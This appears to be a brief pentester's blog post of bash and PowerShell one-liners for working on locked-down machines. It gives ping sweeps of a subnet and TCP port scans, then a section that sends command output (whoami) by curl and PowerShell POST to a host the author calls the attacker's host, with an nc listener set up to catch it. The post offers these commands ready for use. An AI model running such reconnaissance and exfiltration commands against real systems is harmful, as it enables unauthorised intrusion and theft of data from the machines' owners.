Just dumping some quick and dirty one-liners! These are commands I had used to explore locked-down Windows and Linux machines, using bash or powershell when no other binaries were available or could be transferred to the boxes easily.

Trying to ping all hosts in a subnet

Linux

for i in $(seq 1 254); do host=192.168.0.$i; if timeout 0.1 ping -c 1 $host >/dev/null; then echo $host is alive; fi; done

Edit – a great improvement of this is the following, recommended by 0xdf:

for i in {1..254}; do (host=192.168.0.$i; if ping -c 1 $host > /dev/null; then echo $host alive; fi &); done

Windows – not the fastest as there is no timeout option for Test-Connection:

powershell -c "1..254 | % {$h='192.168.0.'+$($_); if ($(Test-Connection -Count 1 $h -ErrorAction SilentlyContinue)) { $('host '+$h+' is alive')|Write-Host}}"

Scanning open ports

Linux:

host=192.168.0.1; for port in {1..1000}; do timeout 0.1 bash -c "echo >/dev/tcp/$host/$port && echo port $port is open"; done 2>/dev/null

… or if nc is avaiable:

for port in $(seq 1 1000); do timeout 0.1 nc -zv 192.168.0.1 $port 2>&1 | grep succeeded; done

Windows – not using Test-NetConnection in order to control the timeout:

powershell -c "$s=$('192.168.0.1');1..1000 | % {$c=New-Object System.Net.Sockets.TcpClient;$c.BeginConnect($s,$_,$null,$null)|Out-Null;Start-Sleep -milli 100; if ($c.Connected) {$('port '+$_+' is open')|Write-Host }}"

Getting output back

… if all you can is running a command blindly, and if there is an open outbound port. In the examples below 192.168.6.6 is the attacker’s host – on which you would start a listener like:

nc -lvp 80

Linux

curl -d $(whoami) 192.168.6.6

Windows

powershell -c curl 192.168.6.6 -method POST -body $(whoami)